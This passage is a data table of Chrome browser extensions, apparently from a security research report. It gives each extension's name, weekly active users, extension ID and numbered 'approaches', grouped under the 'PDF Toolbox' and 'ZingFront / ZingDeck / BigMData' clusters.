Color Picker, Eyedropper - Geco colorpick 2,000,000 eokjikchkppnkdipbiggnmlkahcdkikp 1, 2, 3, 4, 6
Dark Mode for Chrome 1,000,000 epbpdmalnhhoggbcckpffgacohbmpapb 1, 2, 4
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab 1, 2, 4
Flash Player Enabler 300,000 eplfglplnlljjpeiccbgnijecmkeimed 1, 2
ChitChat - Search with ChatGPT 2,000,000 fbbjijdngocdplimineplmdllhjkaece 1, 2, 3, 4
Simple Volume Booster 1,000,000 fbjhgeaafhlbjiejehpjdnghinlcceak 1, 2, 4, 6
Free VPN for Chrome - VPN Proxy 1click VPN 8,000,000 fcfhplploccackoneaefokcmbjfbkenj 1, 2
InSaverify - Web for Instagram™ 800,000 fobaamfiblkoobhjpiigemmdegbmpohd 1, 2, 4, 6
ChatGPT Assistant - GPT Search 900,000 gadbpecoinogdkljjbjffmiijpebooce 1, 2, 4, 6
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca 1, 2, 3, 4
Web Sound Equalizer 700,000 gceehiicnbpehbbdaloolaanlnddailm 1, 2, 4, 6
Screenshot Master: Full Page Capture 700,000 ggacghlcchiiejclfdajbpkbjfgjhfol 1, 2, 4
Dark Theme - Dark mode for Chrome 900,000 gjjbmfigjpgnehjioicaalopaikcnheo 1, 2, 4
Cute Tab - Custom Dashboard 60,000 gkdefhnhldnmfnajfkeldcaihahkhhnd 1
Quick Translate: Reading & writing translator 100,000 gpdfpljioapjogbnlpmganakfjcemifk 1, 2, 4
HD Video Downloader 800,000 hjlekdknhjogancdagnndeenmobeofgm 1, 2
Web Translate - Online translator 1,000,000 hnfabcchmopgohnhkcojhocneefbnffg 1, 2, 3, 4, 6
QR Code Generator 300,000 hoeiookpkijlnjdafhaclpdbfflelmci 1, 2, 4
2048 Game 1,000,000 iabflonngmpkalkpbjonemaamlgdghea 4
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj 4, 6
Multilanguage Translator 1,000,000 ielooaepfhfcnmihgnabkldnpddnnldl 1, 2, 3, 4, 6
FocusGuard - Block Site & Focus Mode 400,000 ifdepgnnjpnbkcgempionjablajancjc 1, 2, 3, 7
Scrnli - Screen Recorder & Screen Capture App 1,000,000 ijejnggjjphlenbhmjhhgcdpehhacaal 1, 2, 4
Web Paint Tool - draw online 600,000 iklgljbighkgbjoecoddejooldolenbj 1, 2, 4, 5
Screen Recorder and Screenshot Tool 1,000,000 imopknpgdihifjkjpmjaagcagkefddnb 1, 2, 4
Free VPN Chrome extension - Best VPN by uVPN 1,000,000 jaoafpkngncfpfggjefnekilbkcpjdgp 1, 2, 7
Video Downloader Social 1,000,000 jbmbplbpgcpooepakloahbjjcpfoegji 1, 2, 4
Color Picker Online - Eyedropper Tool 189 jbnefeeccnjmnceegehljhjonmlbkaji 1, 2
Volume Booster, equalizer → Audio control 1,000,000 jchmabokofdoabocpiicjljelmackhho 1, 4
PDF Viewer 1,000,000 jdlkkmamiaikhfampledjnhhkbeifokk 1, 2, 4
Adblock Web - Adblocker for Chrome 300,000 jhkhlgaomejplkanglolfpcmfknnomle 1, 2, 3
Adblock Unlimited - Adblocker 600,000 jiaopkfkampgnnkckajcbdgannoipcne 1, 2, 3, 4
Hide YouTube distraction - shorts block 1,000 jipbilmidhcobblmekbceanghkdinccc 1, 2, 3
ChatGPT for Chrome - GPT Search 700,000 jlbpahgopcmomkgegpbmopfodolajhbl 1, 2, 3
Adblock for YouTube™ 2,000,000 jpefmbpcbebpjpmelobfakahfdcgcmkl 1, 2, 3, 4
User Agent Switcher 100,000 kchfmpdcejfkipopnolndinkeoipnoia 1
Speed Test for Chrome - WiFi speedtest 400,000 khhnfdoljialnlomkdkphhdhngfppabl 1, 2, 4, 6
Video Downloader professional 400,000 knkpjhkhlfebmefnommmehegjgglnkdm 1, 2, 4
Quick Translate 700,000 kpcdbiholadphpbimkgckhggglklemib 1, 2, 4, 6
Tab Suspender 100,000 laameccjpleogmfhilmffpdbiibgbekf 1
Adblock for Youtube - ad blocker tool 800,000 lagdcjmbchphhndlbpfajelapcodekll 1, 2, 3, 4
PDF Viewer - open in PDF Reader 300,000 ldaohgblglnkmddflcccnfakholmaacl 1, 2, 4
Moment - #1 Personal Dashboard for Chrome 200,000 lgecddhfcfhlmllljooldkbbijdcnlpe 1
Screen Video Recorder & Screenshot 400,000 lhannfkhjdhmibllojbbdjdbpegidojj 1, 2
Dark Theme - Dark Reader for Web 1,000,000 ljjmnbjaapnggdiibfleeiaookhcodnl 1, 2, 4, 6
Auto Refresh Page - reload page 500,000 lkhdihmnnmnmpibnadlgjfmalbaoenem 1, 2, 4, 6
Flash Player for Web 800,000 lkhhagecaghfakddbncibijbjmgfhfdm 1, 2, 4, 6
INSSAVE - App for Instagram 100,000 lknpbgnookklokdjomiildnlalffjmma 1, 2, 4, 6
Simple Translator, Dictionary, TTS 1,000,000 lojpdfjjionbhgplcangflkalmiadhfi 1, 2, 3, 4, 6
Web paint tool - Drawww 60,000 mclgkicemmkpcooobfgcgocmcejnmgij 6
Adblock for Twitch 200,000 mdomkpjejpboocpojfikalapgholajdc 1, 2, 3, 4
Infinite Dashboard - New Tab like no other 200,000 meffljleomgifbbcffejnmhjagncfpbd 1, 2, 4
ChatGPT Assistant for Chrome - SidebarGPT 1,000,000 mejjgaogggabifjfjdbnobinfibaamla 1, 2
Volume Max - Ultimate Sound Booster 1,000,000 mgbhdehiapbjamfgekfpebmhmnmcmemg 1, 2, 4
Good Video Downloader 400,000 mhpcabliilgadobjpkameggapnpeppdg 4
Video Downloader Unlimited 1,000,000 mkjjckchdfhjbpckippbnipkdnlidbeb 1, 2, 4
ChatGPT for Google: Search GPT 500,000 mlkjjjmhjijlmafgjlpkiobpdocdbncj 1, 2, 4, 6
Translate - Translator, Dictionary, TTS 1,000,000 mnlohknjofogcljbcknkakphddjpijak 1, 2, 3, 4, 5
Web Paint - Page Marker & Editor 400,000 mnopmeepcnldaopgndiielmfoblaennk 1, 2, 4, 6
Auto Refresh & Page Monitor 1,000,000 nagebjgefhenmjbjhjmdifchbnbmjgpa 1, 2, 4
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc 1, 2, 4
SearchGPT - ChatGPT for Chrome 2,000,000 ninecedhhpccjifamhafbdelibdjibgd 1, 2
Video Speed Controller for HTML videos 400,000 nkkhljadiejecbgelalchmjncoilpnlk 1, 2, 4, 6
Flash Player that Works! 300,000 nlfaobjnjbmbdnoeiijojjmeihbheegn 1, 2, 4, 6
Sound Booster - increase volume up 1,000,000 nmigaijibiabddkkmjhlehchpmgbokfj 1, 2, 4, 6
Voice Reader: Read Aloud Text to Speech (TTS) 500,000 npdkkcjlmhcnnaoobfdjndibfkkhhdfn 1, 2, 4, 5
uTab - Unlimited Custom Dashboard 200,000 npmjjkphdlmbeidbdbfefgedondknlaf 1, 4, 6
Flash Player for Chrome 600,000 oakbcaafbicdddpdlhbchhpblmhefngh 1, 2
Paint Tool by Painty 400,000 obdhcplpbliifflekgclobogbdliddjd 1, 2
Night Shift 200,000 ocginjipilabheemhfbedijlhajbcabh 1, 2
Editor for Docs, Sheets & Slides 200,000 oepjogknopbbibcjcojmedaepolkghpb 1, 2, 6
Accept all cookies 300,000 ofpnikijgfhlmmjlpkfaifhhdonchhoi 1, 2, 3, 4
The Cleaner - delete Cookies and Cache 100,000 ogfjgagnmkiigilnoiabkbbajinanlbn 1, 2
Screenshot & Screen Recorder 1,000,000 okkffdhbfplmbjblhgapnchjinanmnij 1, 2, 4
Cute ColorBook - Coloring Book Online 9,000 onhcjmpaffbelbeeaajhplmhfmablenk 1
What Font - font finder 400,000 opogloaldjiplhogobhmghlgnlciebin 1, 2, 4
Translator - Select to Translate 1,000,000 pfoflbejajgbpkmllhogfpnekjiempip 1, 2, 3, 4, 6
Custom Cursors for Chrome 800,000 phfkifnjcmdcmljnnablahicoabkokbg 1, 2, 4
Color Picker - Eyedropper Tool 100,000 phillbeieoddghchonmfebjhclflpoaj 1, 2, 4, 6
Text mode for websites - ReadBee 500,000 phjbepamfhjgjdgmbhmfflhnlohldchb 1, 2, 4, 6
Dark Mode - Dark Reader for Сhrome 8,000,000 pjbgfifennfhnbkhoidkdchbflppjncb 1, 2, 4, 6
Sound Booster - Boost My Bass 900,000 plmlopfeeobajiecodiggabcihohcnge 1, 2, 4
Sound Booster 100,000 pmilcmjbofinpnbnpanpdadijibcgifc 1, 2, 4
Screen Capture - Screenshot Tool 700,000 pmnphobdokkajkpbkajlaiooipfcpgio 1, 4
Floating Video with Playback Controls 800,000 pnanegnllonoiklmmlegcaajoicfifcm 1, 2
Cleaner - history & cache clean 100,000 pooaemmkohlphkekccfajnbcokjlbehk 1, 2, 4, 6

PDF Toolbox cluster

Name Weekly active users Extension ID Approaches
Stick Ninja Game 3,000,000 aamepfadihoeifgmkoipamkenlfpjgcm 4
Emoboard Emoji Keyboard 3,000,000 aapdabiebopmbpidefegdaefepkinidd 1, 2, 4
Flappy Bird Original 4,000,000 aejdicmbgglbjfepfbiofnmibcgkkjej 1, 2, 4
Superb Copy 4,000,000 agdjnnfibbfdffpdljlilaldngfheapb 1, 2, 4
Super Volume Booster 1,000,000 ahddimnokcichfhgpibgbgofheobffkb 4
Enlargify 2,000,000 aielbbnajdbopdbnecilekkchkgocifh 1, 2, 4
ImgGet 3,000,000 anblaegeegjbfiehjadgmonejlbcloob 1, 2, 4
Blaze VPN for Chrome 8,000,000 anenfchlanlnhmjibebhkgbnelojooic 1, 2, 4
Web Paint Smart 1,000,000 baaibngpibdagiocgahmnpkegfnldklp 1, 2, 4
Click Color Picker 4,000,000 bfenhnialnnileognddgkbdgpknpfich 1, 2, 4
Dino 3D 3,000,000 biggdlcjhcjibifefpchffmfpmclmfmk 1, 2, 4
Soundup Sound Booster 6,000,000 bjpebnkmbcningccjakffilbmaojljlb 1, 2, 7
Yshot 3,000,000 bkgepfjmcfhiikfmamakfhdhogohgpac 1, 2, 4, 7
VidRate 4,000,000 bmdjpblldhdnmknfkjkdibljeblmcfoi 1, 2, 4
Ultra Volume Booster 3,000,000 bocmpjikpfmhfcjjpkhfdkclpfmceccg 1, 2, 4
Supreme Copy 6,000,000 cbfimnpbnbgjbpcnaablibnekhfghbac 1, 2, 4
Lumina Night Mode 400,000 ccemhgcpobolddhpebenclgpohlkegdg 1, 2, 4
Amazing Screen Recorder 6,000,000 cdepgbjlkoocpnifahdfjdhlfiamnapm 1, 2, 4
BPuzzle 10,000 cgjlgmcfhoicddhjikmjglhgibchboea 1, 2, 4
Super Video Speed Controller 6,000,000 chnccghejnflbccphgkncbmllhfljdfa 1, 2, 4
Lensify 1,000,000 ckdcieaenmejickienoanmjbhcfphmio 1, 2, 4
FontSpotter 2,000,000 cncllbaocdclnknlaciemnogblnljeej 1, 2, 4, 6
ImageNest 2,000,000 dajkomgkhpnmdilokgoekdfnfknjgckh 1, 2, 4
Swift Auto Refresh 4,000,000 dbplihfpjfngpdogehdcocadhockmamf 1, 2, 4
StopSurf 2,000,000 dcjbilopnjnajannajlojjcljaclgdpd 1, 2, 4
PDF SmartBox 10,000,000 dgbbafiiohandadmjfcffjpnlmdlaalh 1, 2, 4
Dungeon Dodge 3,000,000 dkdeafhmbobcccfnkofedleddfbinjgp 1, 2, 4
Scope Master 2,000,000 dlbfbjkldnioadbilgbfilbhafplbnan 1, 2, 4
RazorWave 3,000,000 ecinoiamecfiknjeahgdknofjmpoemmi 1, 2, 4
TurboPlay 4,000,000 ehhbjkehfcjlehkfpffogeijpinlgjik 1, 2, 4
Emoji keyboard live 3,000,000 elhapkijbdpkjpjbomipbfofipeofedj 1, 2, 4
Flashback Flash Player 3,000,000 emghchaodgedjemnkicegacekihblemd 1, 2, 4
RampShield Adblock 2,000,000 engbpelfmhnfbmpobdooifgnfcmlfblf 1, 2, 3, 4
BackNav 2,000,000 epalebfbjkaahdmoaifelbgfpideadle 1, 2, 4
Spark blocker 5,000,000 gfplodojgophcijhbkcfmaiafklijpnf 1, 2, 7
EmuFlash 1,000,000 ghomhhneebnpahhjegclgogmbmhaddpi 1, 2, 4
Minesweeper Original 4,000,000 gjdmanggfaalgnpinolamlefhcjimmam 1, 2, 4
PixGrid Ruler 1,000,000 glkplndamjplebapgopdlbicglmfimic 1, 2, 4
Flexi PDF Reader 1,000,000 gmpignfmmkcpnildloceikjmlnjdjgdg 1, 2, 4
Dino Rush 2,000,000 hbkkncjljigpfhghnjhjaaimceakjdoo 1, 2, 4
Amazing color picker 4,000,000 hclbckmnpbnkcpemopdngipibdagmjei 1, 2, 4
ChatGPT Assistant Plus 6,000,000 hhclmnigoigikdgiflfihpkglefbaaoa 1, 2, 4
Bspace 3,000,000 hhgokdlbkelmpeimeijobggjmipechcp 1, 2, 4
Bomberman Classic Game 4,000,000 hlcfpgkgbdgjhnfdgaechkfiddkgnlkg 4
Inline Lingo 4,000,000 hmioicehiobjekahjabipaeidfdcnhii 1, 2, 4
Superpowers for Chatgpt 4,000,000 ibeabbjcphoflmlccjgpebbamkbglpip 1, 2, 4
Spark Auto Refresh 4,000,000 ifodiakohghkaegdhahdbcdfejcghlob 1, 2, 4
Video Speed Pro 6,000,000 iinblfpbdoplpbdkepibimlgabgkaika 1, 2, 4
Elysian EPUB Reader 10,000 ijlajdhnhokgdpdlbiomkekneoejnhad 1, 4
Smart Color Picker 1,000,000 ilifjbbjhbgkhgabebllmlcldfdgopfl 1, 2, 4
Ad Skip Master for Youtube 6,000,000 imlalpfjijneacdcjgjmphcpmlhkhkho 1, 2, 4, 7
Shopify spy scraper & parser 300,000 injdgfhiepghpnihhgmkejcjnoohaibm 1, 2, 4
Gloom Dark Mode 4,000,000 ioleaeachefbknoefhkbhijdhakaepcb 1, 2, 4
SnapTrans 3,000,000 jfcnoffhkhikehdbdioahmlhdnknikhl 1, 2, 4
DownloadAs PNG JPG 2,000,000 jjekghbhljeigipmihbdeeonafimpole 1, 2, 4
Umbra Dark Mode 3,000,000 jjlelpahdhfgabeecnfppnmlllcmejkg 1, 2, 4
Power Tools for ChatGPT 11,000,000 jkfkhkobbahllilejfidknldjhgelcog 1, 2, 4, 6
Image Formatter 7,000 kapklhhpcnelfhlendhjfhddcddfabap 1, 2, 4
Safum free VPN 6,000,000 kbdlpfmnciffgllhfijijnakeipkngbe 1, 2, 3, 4
TabColor color picker 500,000 kcebljecdacbgcoiajdooincchocggha 1, 2, 4
Tonalis Audio Recorder 3,000,000 kdchfpnbblcmofemnhnckhjfjndcibej 1, 2, 4
2048 Classic Game 6,000,000 kgfeiebnfmmfpomhochmlfmdmjmfedfj 4
Pixdownify 7,000 kjeimdncknielhlilmlgbclmkbogfkpo 1, 2, 4, 7
Avatar Maker Studio 3,000,000 klfkmphcempkflbmmmdphcphpppjjoic 1, 2, 4
TypeScan What Font Finder 2,000,000 klopcieildbkpjfgfohccoknkbpchpcd 1, 2, 4
Rad Video Speed Controller 1,000,000 knekhgnpelgcdmojllcbkkfndcmnjfpp 1, 2, 4
Sublime Copy 2,000,000 kngefefeojnjcfnaegliccjlnclnlgck 1, 2, 4
2048 Game 6,000,000 kopgfdlilooenmccnkaiagfndkhhncdn 4
Easy PDF Viewer 600,000 kppkpfjckhillkjfhpekeoeobieedbpd 1, 2, 4
Fullshot 900,000 lcpbgpffiecejffeokiimlehgjobmlfa 1, 2, 4
Page Auto Refresh 8,000,000 ldgjechphfcppimcgcjcblmnhkjniakn 1, 2, 4
Viddex Video Downloader 2,000,000 ldmhnpbmplbafajaabcmkindgnclbaci 1, 2, 4
Smart Audio Capture 3,000,000 lfohcapleakcfmajfdeomgobhecliepj 1, 2, 4
Readline 3,000,000 lgfibgggkoedaaihmmcifkmdfdjenlpp 1, 2, 4
Amazing Auto Refresh 6,000,000 lgjmjfjpldlhbaeinfjbgokoakpjglbn 1, 2, 4
Picture in Picture player 5,000,000 lppddlnjpnlpglochkpkepmgpcjalobc 1, 2, 4
Readwell 1,000,000 mafdefkoclffkegnnepcmbcekepgmgoe 1, 2, 4
Screenshot X 1,000,000 mfdjihclbpcjabciijmcmagmndpgdkbp 1, 2, 3, 4
TubeBlock - Adblock for Youtube 7,000,000 mkdijghjjdkfpohnmmoicikpkjodcmio 1, 2, 4
Shade Dark Mode 16,000,000 mkeimkkbcndbdlfkbfhhlfgkilcfniic 1, 2, 4
PDF Wizardry 3,000,000 moapkmgopcfpmljondihnidamjljhinm 1, 2, 4
ShieldSpan Adblock 2,000,000 monfcompdlmiffoknmpniphegmegadoa 1, 2, 3, 4
Snap Color Picker 6,000,000 nbpljhppefmpifoffhhmllmacfdckokh 1, 2, 4
Spelunky Classic 3,000,000 nggoojkpifcfgdkhfipiikldhdhljhng 4
Adkrig 6,000,000 ngpkfeladpdiabdhebjlgaccfonefmom 1, 2, 3, 4
Snap Screen Recorder 4,000 njmplmjcngplhnahhajkebmnaaogpobl 1, 2, 4
SharpGrip 3,000,000 nlpopfilalpnmgodjpobmoednbecjcnh 1, 2, 4
Block Site Ex 20,000 nnkkgbabjapocnoedeaifoimlbejjckj 1, 2, 4
PageTurn Book Reader 1,000,000 oapldohmfnnhaledannjhkbllejjaljj 1, 2, 4
FocusShield 4,000,000 ohdkdaaigbjnbpdljjfkpjpdbnlcbcoj 1, 2, 4
Loudify Volume Booster 7,000,000 ohlijedbbfaeobchboobaffbmpjdiinh 1, 2, 4
ChatGPT Toolkit 6,000,000 okanoajihjohgmbifnkiebaobfkgenfa 4
Pac Man Tribute 3,000,000 okkijechcafgdmbacodaghgeanecimgd 1, 2, 4
Wordle Timeless 3,000,000 pccilkiggeianmelipmnakallflhakhh 4
Web Paint Online 3,000,000 pcgjkiiepdbfbhcddncidopmihdekemj 1, 2, 4
Live Screen Recorder 4,000,000 pcjdfmihalemjjomplpfbdnicngfnopn 1, 2, 4
Screenshot Master 6,000,000 pdlmjggogjgoaifncfpkhldgfilgghgc 1, 2, 4
Emojet - Emoji Keyboard 4,000,000 pgnibfiljggdcllbncbnnhhkajmfibgp 1, 2, 4
Metric Spy 2,000,000 plifocdammkpinhfihphfbbnlggbcjpo 1, 2, 4
Tetris Classic 6,000,000 pmlcjncilaaaemknfefmegedhcgelmee 1, 2, 4

ZingFront / ZingDeck / BigMData

Name Weekly active users Extension ID Approaches
Download Telegram - TG Video Photo Download 1,000 aaanclnbkhoomaefcdpcoeikacfilokk 1
Open AI ChatGPT for Email - GMPlus 40,000 abekedpmkgndeflcidpkkddapnjnocjp 1, 5
AI Cover Letter Generator - Supawork AI 2,000 aceohhcgmceafglcfiobamlbeklffhna 1, 2
AI Headshot Generator - Supawork AI 5,000 acgbggfkaphffpbcljiibhfipmmpboep 1, 6
IG Follower Export Tool - IG Email Extractor 10,000 acibfjbekmadebcjeimaedenabojnnil 1
WA Sender - Bulk Message & WA Message & Bulk Sender Tool 3,000 aemhfpfbocllfcbpiofnmacfmjdmoecf 1, 5
Save Ins Comment - Export Ins Comments 1,000 afkkaodiebbdbneecpjnfhiinjegddco 1
Coursera Summary with ChatGPT and Take Notes 3,000 afmnhehfpjmkajjglfakmgmjcclhjane 1, 2, 5
Extension Manager for Chrome™ 966 ahbicehkkbofghlofjinmiflogakiifo 1, 5
Email Finder & Email Hunter - GMPlus 10,000 aihgkhchhecmambgbonicffgneidgclh 1, 5
Sora Video To Video - Arting AI 106 aioieeioikmcgggaldfknjfoeihahfkb 1, 2
ChatGPT for 知乎 415 ajnofpkfojgkfmcniokfhodfoedkameh 1, 2, 5
Walmart Finder&ChatGPT Review Analysis 457 akgdobgbammbhgjkijpcjhgjaemghhin 5
WA Bulk Message Sender - Premium Sender 1,000 amokpeafejimkmcjjhbehganpgidcbif 1
One-Click Search Aliexpress Similar Products 97 aobhkgpkibbkonodnakimogghmiecend 5
Summary with Bing Chat for YouTube 9,000 aohgbidimgkcolmkopencknhbnchfnkm 1, 5
Rakuten Customer Service Helper 42 apfhjcjhmegloofljjlcloiolpfendka 5
ChatBot AI - ChatGPT & Claude & Bard & Bing 883 apknopgplijcepgmlncjhdcdjifhdmbo 4, 5
NoteGPT: YouTube Summary, Webpages & PDF Summary 200,000 baecjmoceaobpnffgnlkloccenkoibbb 5
Dimmy - Discord Chat Exporter 252 bbgnnieijkdeodgdkhnkildfjbnoedno 1
Gmail Notes - Add notes to email in Gmail 1,000 bbpgdlmdmlalbacneejkinpnpngnnghj 5
Sora Image To Video - Arting AI 372 bdhknkbhmjkkincjjmhibjeeljdmelje 1, 2
Tiktok Customer Service Helper 66 bdkogigofdpjbplcphfikldoejopkemf 5
TikClient - Web Client for TikTok™ 10,000 beopoaohjhehmihfkpgcdbnppdeaiflc 1, 2, 6
One-Click Search Amazon Similar Products 146 bfeaokkleomnhnbhdhkieoebioepbkkb 5
Custom New Tab Page 864 bfhappcgfmpmlbmgbgmjjlihddgkeomd 5
Shopee Downloader - Download Videos & Images 3,000 bfmonflmfpmhpdinmanpaffcjgpiipom 1, 2, 5
Product Photography - Ai Background Generator For Prouduct Photos 46 bgehgjenjneoghlokaelolibebejljlh 1, 2
TikGPT: Tiktok Listing Optimizer 665 bhbjjhpgpiljcinblahaeaijeofhknka 5
Find WhatsApp Link - Group Invite Link 2,000 biihmgacgicpcofihcijpffndeehmdga 1, 5
VideoTG - Download & Save telegram Videos Fast & one time! 4,000 bjnaoodhkicimgdhnlfjfobfakcnhkje 1
Etsy™ AI Review Analysis & Download 8,000 bjoclknnffeefmonnodiakjbbdjdaigf 5
iGoo Helper - Security Privacy Unblock VPN 20,000 bkcbdcoknmfkccdhdendnbkjmhdmmnfc 5
TikTok Analytics & Sort Video by Engagement 1,000 bnjgeaohcnpcianfippccjdpiejgdfgj 5
Rakuten AI Listing editor 68 cachgfjiefofkmijjdcdnenjlljpiklj 5
Invite All Friends for Facebook™ in one click 10,000 cajeghdabniclkckmaiagnppocmcilcd 5
EbayGPT: ChatGPT Ebay listing optimization 2,000 cbmmciaanapafchagldbcoiegcajgepo 5
Comment Exporter 10,000 cckachhlpdnncmhlhaepfcmmhadmpbgp 1, 2
Twitch Danmaku(NicoNico style) 646 cecgmkjinnohgnokkfmldmklhocndnia 5
Easy Exporter - Etsy order exporter 2,000 cgganjhojpaejcnglgnpganbafoloofa 5
Privacy Extension for WhatsApp Privacy 100,000 cgipcgghboamefelooajpiabilddemlh 1, 2
Group Extractor for social media platform 1,000 chldekfeeeaolinlilgkeaebbcnkigeo 6
Sales Sort for eBay™ Advanced Search 4,000 cigjjnkjdjhhncooaedjbkiojgelfocc 1, 2, 3, 5
Amazon Customer Service Helper 70 cmfafbmoadifedfpkmmgmngimbbgddlo 5
Currency Conversion Calculator 2,000 cmkmopgjpnjhmlgcpmagbcfkmakeihof 5
LinkedRadar-Headline Generator for LinkedIn™ 1,000 cnhoekaognmidchcealfgjicikanodii 1, 5
AllegroGPT:ChatGPT for Allegro Open AI Writer 163 coljimimahbepcbljijpimokkldfinho 5
ai voice cover 518 cpjhnkdcdpifokijolehlmomppnfflop 1
WA Contacts Extractor 30,000 dcidojkknfgophlmohhpdlmoiegfbkdd 1
Twitch chat overlay on fullscreen 832 dckidogeibljnigjfahibbdnagakkiol 5
Privacy Extension for WhatsApp Privacy 660 dcohaklbddmflhmcnccgcajgkfhchfja 1
LINE App Translator Bot - LINE Chat 1,000 dimpmploihiahcbbdoanlmihnmcfjbgf 5
Etsy Image Search 1,000 dkgoifbphbpimdbjhkbmbbhhfafjdilp 5
AliExpress & eBay - Best price 575 dkoidcgcbmejimkbmgjimpdgkgilnncj 5
AliGPT: Aliexpress Listing Optimize 1,000 dlbmngbbcpeofkcadbglihfdndjbefce 5
Best ASO Tools for Google Play Store 10,000 doffdbedgdhbmffejikhlojkopaleian 5
NoteGPT: AI Flashcard for Quizlet and Cram 10,000 eacfcoicoelokngmcgkkdakohpaklgmk 1, 2, 5
ChatSider AI Copilot : ChatGPT & Claude 2,000 ecnknpjoomhilbhjipoipllgdgaldhll 6
Mercadolivre Customer Service Helper with GPT 19 edhpagpcfhelpopmcdjeinmckcjnccfm 5
WA Contacts Extractor Free Extension 30,000 eelhmnjkbjmlcglpiaegojkoolckdgaj 1, 6
Unlimited Summary Generator for YouTube™ 70,000 eelolnalmpdjemddgmpnmobdhnglfpje 1, 2, 5
AdLibNote: Ad Library Downloader Facebook™ 10,000 efaadoiclcgkpnjfgbaiplhebcmbipnn 1, 2
Ebay Kundendiensthelfer mit GPT 123 efknldogiepheifabdnikikchojdgjhb 5
Extension Manager 8,000 efolofldmcajcobffimbnokcnfcicooc 5
Send from Gmail - Share a Link Via Email 5,000 egefdkphhgpfilgcaejconjganlfehif 1, 3, 5
Followers Exporter for Ins 100,000 ehbjlcniiagahknoclpikfjgnnggkoac 1, 2
Website Keyword Extractor & Planner Tool 10,000 eiddpicgliccgcgclfoddoiebfaippkj 6
AMZ Currency Converter —— Amazon TS 457 ekekfjikpoacmfjnnebfjjndfhlldegj 1
eCommerce Profit Calculator 3,000 elclhhlknlgnkbihjkneaolgapklcakh 1, 2, 5
ChatGPT for Google (No Ads) 30,000 elnanopkpogbhmgppdoapkjlfigecncf 1, 3, 5
AI Resume Builder - Supawork AI 9,000 epljmdbeelhhkllonphikmilmofkfffb 1, 4
aliexpress image video download 1,000 epmknedkclajihckoaaoeimohljkjmip 5
InstaNote: Download and Save Video for IG 10,000 fbccnclbchlcnpdlhdjfhbhdehoaafeg 1, 2, 5
Ebay Niche Finder&ChatGPT Review Analysis 419 fencfpodkdpafgfohkcnnjjepolndkoc 5
One-Click Search Etsy Similar Products 83 fffpcfejndndidjbakpmafngnmkphlai 5
WA Link Generator 315 fgmmhlgbkieebimhondmhbnihhaoccmj 1
AI Script Writer & Video to Text for TikTok 9,000 fhbibaofbmghcofnficlmfaoobacbnlm 1, 2, 5
WA Bulk Message Sender 100,000 fhkimgpddcmnleeaicdjggpedegolbkb 1, 5
Free VPN For Chrome - HavenSurf VPN 3,000 fnofnlokejkngcopdkaopafdbdcibmcm 5
McdGPT: Mercadolivre AI Listing edit 340 fpgcecmnofcebcocojgbnmlakeappphj 5
CRM Integration with LinkedIn for Salesforce 411 fpieanbcbflkkhljicblgbmndgblndgh 5
Online Photoshop - Photo Editor Tool 577 fplnkidbpmcpnaepdnjconfhkaehapji 1, 2, 5
Telegram Private Video Downloader 20,000 gdfhmpjihkjpkcgfoclondnjlignnaap 1, 2
AI Signature Generator - SignMaker 74 gdkcaphpnmahjnbbknailofhkdjgonjp 1, 2, 5
Privacy Extension for WhatsApp Web 2,000 gedkjjhehhbgpngdjmjoklficpaojmof 1
One-Click Search Shein Similar Products 232 gfapgmkimcppbjmkkomcjnamlcnengnp 5
Summary with ChatGPT for Google and YouTube 10,000 gfecljmddkaiphnmhgaeekgkadnooafb 1, 2, 5
ESale - Etsy™ SEO tool for seller 10,000 ghnjojhkdncaipbfchceeefgkkdpaelk 5
Twitter Video Downloader 10,000 giallgikapfggjdeagapilcaiigofkoe 1, 2, 5
Video Downloader and Summary for TikTok 3,000 gibojgncpopnmbjnfdgnfihhkpooodie 1, 2, 5
Audio Recorder Online - Capture Screen Audio 3,000 gilmhnfniipoefkgfaoociaehdcmdcgk 1, 2, 5
WalmartGPT:ChatGPT for Walmart Open AI Writer 682 gjacllhmphdmlfomfihembbodmebibgh 5
ChatShopee - AI Customer Service Helper 88 glfonehedbdfimabajjneobedehbpkcf 5
Magic VPN - Best Free VPN for Chrome 5,000 glnhjppnpgfaapdemcpihhkobagpnfee 5
Translate and Speak Subtitles for YouTube 40,000 gmimaknkjommijabfploclcikgjacpdn 1, 2, 3, 5
Messenger Notifier 3,000 gnanlfpgbbiojiiljkemdcampafecbmk 5
One-Click Search Walmart Similar Products 103 golgjgpiogjbjbaopjeijppihoacbloi 5
TikTok Hashtags Tool - Hashtags Analytics 779 haefbieiimgmamklihjpjhnhfbonfjgg 1, 5
Gmail Checker - Multi Account Gmail Notifier 9,000 hangbmidafgeohijjheoocjjpdbpaaeh 1, 5
Bulk Message Sender for wa 281 hcbplmjpaneiaicainjmanjhmdcfpeji 2
APP For IG DM 10,000 hccnecipbimihniebnopnmigjanmnjgh 1, 2, 5
Likes Exporter 6,000 hcdnbmbdfhhfjejboimdelpfjielfnde 1, 2
ChatsNow: ChatGPT AI Sidebar ( GPT, Claude , Gemini) 20,000 hcmiiaachajoiijecmakkhlcpagafklj 1, 2, 5
iTextMaster - ChatPDF & PPT AI with ChatGPT 6,000 hdofgklnkhhehjblblcdfohmplcebaeg 1, 2, 3, 5
Shopify™ Raise - Shopify™ store analysis tool 10,000 hdpfnbgfohonaplgnaahcefglgclmdpo 1, 2, 3
ShopeeGPT - Optimize Titles & Descriptions 713 hfgfkkkaldbekkkaonikedmeepafpoak 5
Telegram Desktop - Telegram Online Messenger 4,000 hifamcclbbjnekfmfgcalafnnlgcaolc 5
CommentGPT - Shopee review analysis assistant 321 hjajjdbieadchdmmifdjgedfhgdnonlh 5
Vimeo™ Downloader and chatGPT Video Summary 40,000 hobdeidpfblapjhejaaigpicnlijdopo 1, 2, 5
IG Comment Export Tool 4,000 hpfnaodfcakdfbnompnfglhjmkoinbfm 1, 2, 5
SEO Search Keyword Tool 40,000 hpmllfbpmmhjncbfofmkkgomjpfaocca 5
IG Video Downloader - SocialPlus 5,000 iaonookehgfokaglaodkeooddjeaodnc 1, 2, 5
AdLibNote: Video Downloader for Facebook™ 10,000 icphfngeemckldjnnoemfadfploieehk 1, 2, 5
IGExporter - IG Follower Export Tool 2,000 iffbofdalhbflagjclkhbkbknhiflcam 1, 2, 5
Wasup Translator - Translate WhatsApp Messages 328 ifhamodfnpjalblgmnpdidnkjjnmkbla 1, 5
